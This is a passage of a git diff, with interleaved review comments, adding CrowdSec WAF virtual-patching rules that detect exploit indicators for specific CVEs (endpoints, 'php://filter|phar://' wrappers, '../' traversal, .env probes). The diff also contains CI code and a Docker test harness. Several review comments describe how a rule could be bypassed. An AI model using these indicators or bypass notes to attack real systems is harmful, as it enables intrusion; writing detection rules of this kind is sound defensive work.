+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
new file mode 100644
index 00000000000..ad84d4c6599
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2021-3129
+description: "Detect CVE-2021-3129 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /_ignition/execute-solution
+ - zones:
+ - BODY_ARGS
+ variables:
+ - json.parameters.viewFile
+ match:
+ type: regex
+ value: "php://filter|phar://"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)"
+ classification:
+ - cve.CVE-2021-3129
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-98
\ No newline at end of file
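Review bot: The `viewFile` regex `"php://filter|phar://"` is case-sensitive while PHP resolves stream wrapper names case-insensitively, so a differently cased wrapper would pass the rule. Adding `transform: - lowercase` to that `BODY_ARGS` branch, as the `ARGS` branch in vpatch-CVE-2022-27926 already does, closes the gap without widening the pattern. As with CVE-2019-12989, the `json.parameters.viewFile` variable depends on the JSON body processor from base-config, which deserves a comment.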
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
new file mode 100644
index 00000000000..25974ee90d4
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
@@ -0,0 +1,31 @@
+name: crowdsecurity/vpatch-CVE-2022-27926
+description: "Detect CVE-2022-27926 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /public/error.jsp
+ - zones:
+ - ARGS
+ variables:
+ - errCode
+ transform:
+ - lowercase
+ match:
+ type: libinjectionXSS
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)"
+ classification:
+ - cve.CVE-2022-27926
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-79
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
new file mode 100644
index 00000000000..f5aad071f58
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
@@ -0,0 +1,24 @@
+name: crowdsecurity/vpatch-CVE-2022-35914
+description: "Detect CVE-2022-35914 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /vendor/htmlawed/htmlawed/htmlawedtest.php
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)"
+ classification:
+ - cve.CVE-2022-35914
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-74
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
new file mode 100644
index 00000000000..66b6ceeba64
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2022-44877
+description: "Detect CVE-2022-44877 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /login/index.php
+ - zones:
+ - ARGS
+ variables:
+ - login
+ match:
+ type: regex
+ value: "[^a-zA-Z0-9_.-]+"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "CentOS Web Panel 7 RCE (CVE-2022-44877)"
+ classification:
+ - cve.CVE-2022-44877
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-78
\ No newline at end of file
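Review bot: The `login` regex `"[^a-zA-Z0-9_.-]+"` fires on any single character outside that set, and with `default_remediation: ban` in the virtual-patching config a legitimate value containing, say, `@` or `+` would ban the client; if the application only ever issues token-like values this is fine, but the assumption should be written down, e.g. `# login is expected to be an opaque token; any shell metacharacter is treated as injection`. If email-style logins are possible, narrowing the class to the characters that matter for command substitution would reduce false positives.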
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
new file mode 100644
index 00000000000..c73dd16afde
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
@@ -0,0 +1,34 @@
+name: crowdsecurity/vpatch-CVE-2022-46169
+description: "Detect CVE-2022-46169 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /remote_agent.php
+ - zones:
+ - ARGS
+ variables:
+ - poller_id
+ match:
+ type: regex
+ value: "[^a-zA-Z0-9_]"
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)"
+ classification:
+ - cve.CVE-2022-46169
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-74
+ - cwe.CWE-77
+ - cwe.CWE-78
+ - cwe.CWE-863
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
new file mode 100644
index 00000000000..1c51bb3dc9b
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
@@ -0,0 +1,28 @@
+name: crowdsecurity/vpatch-CVE-2023-20198
+description: "Detect CVE-2023-20198 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /%77ebui_wsma_https
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "CISCO IOS XE account creation (CVE-2023-20198)"
+ classification:
+ - cve.CVE-2023-20198
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-287
\ No newline at end of file
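Review bot: The URI clause matches only the percent-encoded spelling `/%77ebui_wsma_https`: if the URI zone is compared after URL decoding the literal `%77` never appears and the clause is dead, and if it is compared raw, the plain `/webui_wsma_https` spelling goes undetected — which form the engine sees is not established by this file. A regex accepting both, `type: regex` with `value: "/(%77|w)ebui_wsma_https$"`, works under either behaviour. A short comment stating why the encoded form is the expected indicator would also help the next reader.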
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
new file mode 100644
index 00000000000..8a54159d587
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-22515
+description: "Detect CVE-2023-22515 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /setup/setupadministrator.action
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - HEADERS
+ variables:
+ - x-atlassian-token
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "no-check"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Atlassian Confluence Privesc (CVE-2023-22515)"
+ classification:
+ - cve.CVE-2023-22515
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
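Review bot: The third `and` clause requires the `x-atlassian-token` header to equal `no-check`, which ties detection to one request shape rather than to the vulnerable endpoint; a POST to `/setup/setupadministrator.action` on an instance that has already completed setup is anomalous on its own. If the header is kept because the application's XSRF filter needs it for the request to succeed (not established here), say so in a comment above the clause, e.g. `# header required by the XSRF filter; without it the request is rejected upstream`; otherwise consider dropping it or moving it to a separate rule so probes that omit the header are still seen.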
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
new file mode 100644
index 00000000000..5cbdf941526
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
@@ -0,0 +1,41 @@
+name: crowdsecurity/vpatch-CVE-2023-24489
+description: "Detect CVE-2023-24489 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /documentum/upload.aspx
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - ARGS
+ variables:
+ - uploadid
+ match:
+ type: contains
+ value: ".."
+ - zones:
+ - RAW_BODY
+#it seems 'Page_Load' is the handler that can be abused, maybe some others can?
+ match:
+ type: contains
+ value: "Page_Load"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix ShareFile RCE (CVE-2023-24489)"
+ classification:
+ - cve.CVE-2023-24489
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
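Review bot: The `RAW_BODY` clause compares `Page_Load` case-sensitively while every other clause in this rule lowercases its input; if the ASP.NET handler lookup on the target is case-insensitive (not established here), a differently cased body passes untouched. Adding `transform:` / `- lowercase` under the `RAW_BODY` zone and using `value: "page_load"` keeps the clause consistent with the rest of the rule. The comment `#it seems 'Page_Load' is the handler...` at column 0 is valid YAML but sits oddly inside the list item; indent it to the `match:` level.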
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
new file mode 100644
index 00000000000..0f35bc2d2e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
@@ -0,0 +1,70 @@
+name: crowdsecurity/vpatch-CVE-2023-33617
+description: "Detect CVE-2023-33617 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: post
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /boaform/admin/formlogin
+ - zones:
+ - BODY_ARGS
+ variables:
+ - username
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "admin"
+ - zones:
+ - BODY_ARGS
+ variables:
+ - psd
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: "parks"
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /boaform/admin/formping
+ - zones:
+ - BODY_ARGS
+ variables:
+ - target_addr
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: "[^a-f0-9:.]+"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Atlassian Confluence Privesc (CVE-2023-33617)"
+ classification:
+ - cve.CVE-2023-33617
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-78
\ No newline at end of file
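Review bot: `label: "Atlassian Confluence Privesc (CVE-2023-33617)"` does not describe this rule — the clauses match `/boaform/admin/formlogin` and `/boaform/admin/formping`, which are not Confluence endpoints, so the string was evidently copied from vpatch-CVE-2023-22515.yaml. Replace it with a label naming the device the advisory covers, e.g. `label: "<affected product> command injection (CVE-2023-33617)"`. The two `and` blocks also handle METHOD differently (`lowercase` transform with `post` versus raw `POST`), and the first block on its own describes a login with the credentials the `username`/`psd` clauses spell out rather than the injection that `cwe.CWE-78` classifies — consider whether it belongs in a separate scan-type rule.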
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
new file mode 100644
index 00000000000..f1e84739d77
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
@@ -0,0 +1,52 @@
+
+name: crowdsecurity/vpatch-CVE-2023-34362
+description: "Detect CVE-2023-34362 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: /moveitisapi/moveitisapi.dll
+ - zones:
+ - ARGS
+ variables:
+ - action
+ match:
+ type: equals
+ value: m2
+ transform:
+ - lowercase
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - HEADERS_NAMES
+ transform:
+ - lowercase
+ match:
+ type: equals
+ value: 'x-silock-transaction'
+ - zones:
+ - HEADERS_NAMES
+ transform:
+ - lowercase
+ match:
+ type: regex
+ value: '.+x-silock-transaction'
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)"
+ classification:
+ - cve.CVE-2023-34362
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-89
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
new file mode 100644
index 00000000000..e03c6c407e0
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-3519
+description: "Detect CVE-2023-3519 exploits "
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: GET
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /gwtest/formssso
+ - zones:
+ - ARGS
+ variables:
+ - target
+ transform:
+ - length
+ match:
+ type: gte
+ value: 100
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Citrix RCE (CVE-2023-3519)"
+ classification:
+ - cve.CVE-2023-3519
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-94
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
new file mode 100644
index 00000000000..f8f59130322
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2023-38205
+description: "Detect CVE-2023-38205 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: contains
+ value: ..cfide/wizards/common/
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Adobe ColdFusion access control bypass (CVE-2023-38205)"
+ classification:
+ - cve.CVE-2023-38205
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
new file mode 100644
index 00000000000..93aab371a94
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-40044
+description: "Detect CVE-2023-40044 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /aht/
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - BODY_ARGS
+ transform:
+ - b64decode
+ - lowercase
+ match:
+ type: contains
+ value: "cmd"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "WS_FTP .NET deserialize RCE (CVE-2023-40044)"
+ classification:
+ - cve.CVE-2023-40044
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-502
+
+
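Review bot: The `BODY_ARGS` clause fires on any body argument whose base64-decoded, lowercased value contains `cmd`, a three-character substring that legitimate encoded content can contain by chance; only the `/aht/` and POST clauses hold it in check, so the rule's precision rests entirely on how specific that path is on the protected host. Either pick a longer indicator from the deserialization payload or add a comment above the clause recording why `cmd` was judged sufficient. The two trailing blank lines at the end of the file can be dropped.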
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
new file mode 100644
index 00000000000..f7832be9a63
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-42793.yaml
@@ -0,0 +1,22 @@
+name: crowdsecurity/vpatch-CVE-2023-42793
+description: "Detect CVE-2023-42793"
+rules:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /rpc2
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "JetBrains Teamcity auth bypass (CVE-2023-42793)"
+ classification:
+ - cve.CVE-2023-42793
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-288
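Review bot: The single `endsWith` `/rpc2` clause flags every request whose path ends in `/rpc2` as a confidence-3 exploit, yet `/RPC2` is the conventional endpoint name of XML-RPC services in general, so on hosts that are not TeamCity this will fire on ordinary traffic. Anchor the clause on the TeamCity REST token path the advisory describes instead, e.g. `type: regex` with `value: "/app/rest/users/[^/]+/tokens/rpc2$"`, and consider a METHOD clause as the sibling rules have. This rule also omits the `- and:` wrapper every other vpatch rule in the commit uses; if both forms are accepted, consistency still helps the lint scripts.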
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
new file mode 100644
index 00000000000..a6dd6738869
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-50164.yaml
@@ -0,0 +1,38 @@
+name: crowdsecurity/vpatch-CVE-2023-50164
+description: "Detect CVE-2023-50164 exploits "
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: upload.action
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: POST
+ - zones:
+ - BODY_ARGS
+ - ARGS
+ variables:
+ - uploadFileName
+ match:
+ type: contains
+ value: "../"
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "Apache Struts2 (CVE-2023-50164)"
+ classification:
+ - cve.CVE-2023-50164
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-552
+
+
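Review bot: The `uploadFileName` clause matches only the literal `../`; the backslash separator is not covered, and because `variables` selects the parameter by exact name, a differently cased parameter name — the very thing CVE-2023-50164 concerns — may be skipped if variable matching is case-sensitive (not established by this file). A regex on the value, `type: regex` / `value: '\.\.[/\\]'`, closes the first gap; for the second, check whether `variables` can match case-insensitively. The URI clause `upload.action` has no leading slash, so it also matches any action name ending in `upload.action`; if that breadth is intended, say so in a comment.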
diff --git a/appsec-rules/crowdsecurity/vpatch-env-access.yaml b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
new file mode 100644
index 00000000000..736b949bd52
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-env-access.yaml
@@ -0,0 +1,20 @@
+name: crowdsecurity/vpatch-env-access
+description: "Detect access to .env files"
+rules:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: endsWith
+ value: /.env
+labels:
+ type: scan
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:scan"
+ label: "Access to .env file"
+ classification:
+ - attack.T1595
+ - attack.T1190
diff --git a/ci.go b/ci.go
index efa3ae748f8..8ac4d0c62b5 100644
--- a/ci.go
+++ b/ci.go
@@ -6,7 +6,6 @@ import (
"flag"
"fmt"
"io"
- "io/ioutil"
"log"
"os"
@@ -27,6 +26,8 @@ type typeInfo struct {
Parsers []string `json:"parsers,omitempty"`
PostOverflows []string `json:"postoverflows,omitempty"`
Scenarios []string `json:"scenarios,omitempty"`
+ AppsecRules []string `json:"appsec-rules,omitempty"`
+ AppsecConfigs []string `json:"appsec-configs,omitempty"`
Collections []string `json:"collections,omitempty"`
}
@@ -38,6 +39,8 @@ type fileInfo struct {
Parsers []string `yaml:"parsers,omitempty"`
PostOverflows []string `yaml:"postoverflows,omitempty"`
Scenarios []string `yaml:"scenarios,omitempty"`
+ AppsecRules []string `yaml:"appsec-rules,omitempty"`
+ AppsecConfigs []string `yaml:"appsec-configs,omitempty"`
Collections []string `yaml:"collections,omitempty"`
}
@@ -46,17 +49,12 @@ type versionInfo struct {
Deprecated bool `json:"deprecated"`
}
-const (
- parsersFolder = "parsers/"
- scenariosFolder = "scenarios/"
- postoverflowsFolder = "postoverflows/"
- collectionsFolder = "collections/"
-)
-
var types = []string{
"parsers",
"scenarios",
"postoverflows",
+ "appsec-rules",
+ "appsec-configs",
"collections",
}
@@ -93,7 +91,7 @@ func main() {
flag.Parse()
if target == "all" || target == "configs" {
- if generate == true {
+ if generate {
for _, t := range types {
configType, err := generateIndex(t)
if err != nil {
@@ -103,7 +101,7 @@ func main() {
}
} else {
// update .index file
- f, _ := ioutil.ReadFile(inputFile)
+ f, _ := os.ReadFile(inputFile)
_ = json.Unmarshal([]byte(f), &tmpIdx)
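Review bot: `f, _ := os.ReadFile(inputFile)` discards the read error, and the next line discards `json.Unmarshal`'s error too, so an unreadable or malformed `inputFile` yields an empty `tmpIdx` and the index is rebuilt from nothing without any message; the commit only swapped `ioutil` for `os` here and kept that. Since this branch runs at the top level of `main`, fail loudly instead: `f, err := os.ReadFile(inputFile); if err != nil { log.Fatalf("reading index %s: %v", inputFile, err) }`, and likewise check the unmarshal. The rest of `main` lies outside this hunk.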
@@ -116,12 +114,12 @@ func main() {
if err != nil {
panic(err)
}
- if err := ioutil.WriteFile(outFile, json, 0644); err != nil {
+ if err := os.WriteFile(outFile, json, 0644); err != nil {
log.Fatalf("failed writting new json index : %s", err)
}
/*Check if the generated index is correct*/
- indexContent, err := ioutil.ReadFile(outFile)
+ indexContent, err := os.ReadFile(outFile)
if err != nil {
log.Fatalf("Unable to read index : %v", err)
}
@@ -151,6 +149,4 @@ func main() {
log.Fatalf("failed to dump new json file : %s", err)
}
}
- return
-
}
diff --git a/collections/crowdsecurity/appsec-crs.md b/collections/crowdsecurity/appsec-crs.md
new file mode 100644
index 00000000000..fa5c0a41b7c
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.md
@@ -0,0 +1,2 @@
+# ModSecurity CRS
+
diff --git a/collections/crowdsecurity/appsec-crs.yaml b/collections/crowdsecurity/appsec-crs.yaml
new file mode 100644
index 00000000000..304ff6db0e1
--- /dev/null
+++ b/collections/crowdsecurity/appsec-crs.yaml
@@ -0,0 +1,13 @@
+parsers:
+ - crowdsecurity/appsec-logs
+appsec-configs:
+ - crowdsecurity/crs
+appsec-rules:
+ - crowdsecurity/crs
+description: "Appsec: Modsecurity core rule set rules"
+author: crowdsecurity
+tags:
+ - linux
+ - http
+ - appsec
+ - modsecurity
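Review bot: Unlike `appsec-virtual-patching.yaml` in the same commit, this collection has no `name:` key; `name: crowdsecurity/appsec-crs` would match the file path. If generate.go derives the hub name from the path (the visible `hubName := fmt.Sprintf("%s/%s", user, configName)` suggests it does) the omission is harmless for indexing, but the two new collections should follow one convention.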
diff --git a/collections/crowdsecurity/appsec-virtual-patching.md b/collections/crowdsecurity/appsec-virtual-patching.md
new file mode 100644
index 00000000000..f7d38651500
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.md
@@ -0,0 +1,3 @@
+# AppSec Virtual Patching
+
+This collection contains virtual patching for commonly exploited vulnerabilities, and is inspired from the [CISA Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog). The goal is to provide virtual patching capabilities for the often exploited vulnerabilities, avoiding false positives while catching pople scouting your applications for juicy vulnerabilities.
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
new file mode 100644
index 00000000000..74a714f457b
--- /dev/null
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -0,0 +1,32 @@
+name: crowdsecurity/appsec-virtual-patching
+appsec-rules:
+ - crowdsecurity/base-config
+ - crowdsecurity/vpatch-env-access
+ - crowdsecurity/vpatch-CVE-2023-40044
+ - crowdsecurity/vpatch-CVE-2017-9841
+ - crowdsecurity/vpatch-CVE-2020-11738
+ - crowdsecurity/vpatch-CVE-2022-27926
+ - crowdsecurity/vpatch-CVE-2022-35914
+ - crowdsecurity/vpatch-CVE-2022-46169
+ - crowdsecurity/vpatch-CVE-2023-20198
+ - crowdsecurity/vpatch-CVE-2023-22515
+ - crowdsecurity/vpatch-CVE-2023-33617
+ - crowdsecurity/vpatch-CVE-2023-34362
+ - crowdsecurity/vpatch-CVE-2023-3519
+ - crowdsecurity/vpatch-CVE-2023-42793
+ - crowdsecurity/vpatch-CVE-2023-50164
+ - crowdsecurity/vpatch-CVE-2023-38205
+ - crowdsecurity/vpatch-CVE-2023-24489
+ - crowdsecurity/vpatch-CVE-2021-3129
+ - crowdsecurity/vpatch-CVE-2021-22941
+ - crowdsecurity/vpatch-CVE-2019-12989
+ - crowdsecurity/vpatch-CVE-2022-44877
+appsec-configs:
+ - crowdsecurity/virtual-patching
+parsers:
+ - crowdsecurity/appsec-logs
+scenarios:
+ - crowdsecurity/appsec-vpatch
+description: "a generic virtual patching collection, suitable for most web servers."
+author: crowdsecurity
+
diff --git a/docker/appsec/Dockerfile b/docker/appsec/Dockerfile
new file mode 100644
index 00000000000..5ebd2c10f6e
--- /dev/null
+++ b/docker/appsec/Dockerfile
@@ -0,0 +1,28 @@
+FROM ubuntu:22.04
+
+# Install dependencies
+RUN apt-get update && apt-get install -y \
+ git \
+ make \
+ software-properties-common \
+ wget \
+ gnupg \
+ ca-certificates \
+ gettext
+
+RUN wget -O - https://openresty.org/package/pubkey.gpg | apt-key add -
+RUN echo "deb http://openresty.org/package/ubuntu $(lsb_release -sc) main"| tee /etc/apt/sources.list.d/openresty.list
+
+RUN apt-get update
+
+RUN apt-get install -y openresty
+
+# Install the bouncer
+COPY build.sh /build.sh
+COPY start.sh /start.sh
+
+RUN chmod +x /build.sh && /build.sh
+RUN chmod +x /start.sh
+
+# Set the script as the entrypoint
+ENTRYPOINT ["/start.sh"]
\ No newline at end of file
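Review bot: `RUN wget -O - https://openresty.org/package/pubkey.gpg | apt-key add -` relies on `apt-key`, which is deprecated on Ubuntu 22.04 and makes the key trusted for every repository rather than just OpenResty's; the next line also calls `lsb_release`, which is not in the installed package list (it may arrive transitively via software-properties-common — verify). Store the key under `/etc/apt/keyrings/` and reference it with `[signed-by=/etc/apt/keyrings/openresty.gpg]` in the sources entry, and add `rm -rf /var/lib/apt/lists/*` after the installs to keep the image small. The file ends without a trailing newline.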
diff --git a/docker/appsec/build.sh b/docker/appsec/build.sh
new file mode 100644
index 00000000000..b6b61fa858a
--- /dev/null
+++ b/docker/appsec/build.sh
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+# clone the repo
+git clone https://github.com/crowdsecurity/cs-openresty-bouncer.git
+cd cs-openresty-bouncer
+
+# tmp until we merge
+git checkout waf_integration
+
+# make the release
+make release
+tar xzvf crowdsec-openresty-bouncer.tgz
+cd crowdsec-openresty-bouncer-v*
+
+# install the bouncer
+./install.sh -y
+
+
+
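Review bot: The script clones `cs-openresty-bouncer`, checks out the mutable `waf_integration` branch, then runs its `make release` and `./install.sh -y` as root inside the image; nothing pins a commit or verifies what was fetched, so the image changes whenever that branch moves and anything pushed to it is installed unnoticed. Pin the checkout (`git checkout <commit-sha>` with the hash recorded here) or fetch a tagged release archive and verify its checksum, and revisit once the `# tmp until we merge` branch lands. `set -e` catches failures, but `cd crowdsec-openresty-bouncer-v*` fails confusingly if the glob matches more than one directory.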
diff --git a/docker/appsec/docker-compose.yaml b/docker/appsec/docker-compose.yaml
new file mode 100644
index 00000000000..6bbf5da529b
--- /dev/null
+++ b/docker/appsec/docker-compose.yaml
@@ -0,0 +1,12 @@
+version: "3.8"
+services:
+ target:
+ build: .
+ environment:
+ - API_URL=http://127.0.0.1:8181
+ - API_KEY=this_is_a_bad_password
+ - APPSEC_URL=http://127.0.0.1:4241
+ volumes:
+ - ./nginx.conf:/usr/local/openresty/nginx/conf/nginx.conf
+ network_mode: "host"
+
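Review bot: `API_KEY=this_is_a_bad_password` is a literal credential committed in the compose file, and `network_mode: "host"` exposes the OpenResty listener from nginx.conf (port 7822) on the host interface rather than inside a compose network. For a local test harness that may be acceptable, but reading the key from the environment (`- API_KEY=${API_KEY:?set API_KEY}`) avoids a hard-coded value that secret scanners will keep flagging. A one-line comment stating that this stack exists only for the appsec test suite would also help.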
diff --git a/docker/appsec/nginx.conf b/docker/appsec/nginx.conf
new file mode 100644
index 00000000000..52b555828d3
--- /dev/null
+++ b/docker/appsec/nginx.conf
@@ -0,0 +1,37 @@
+
+worker_processes 4;
+
+events {
+ worker_connections 1024;
+}
+
+http {
+ include mime.types;
+ default_type application/octet-stream;
+ sendfile on;
+ keepalive_timeout 65;
+
+ access_log /dev/stdout;
+ error_log /dev/stderr;
+
+ resolver 127.0.0.11;
+
+ include /usr/local/openresty/nginx/conf/conf.d/crowdsec_openresty.conf;
+
+ server {
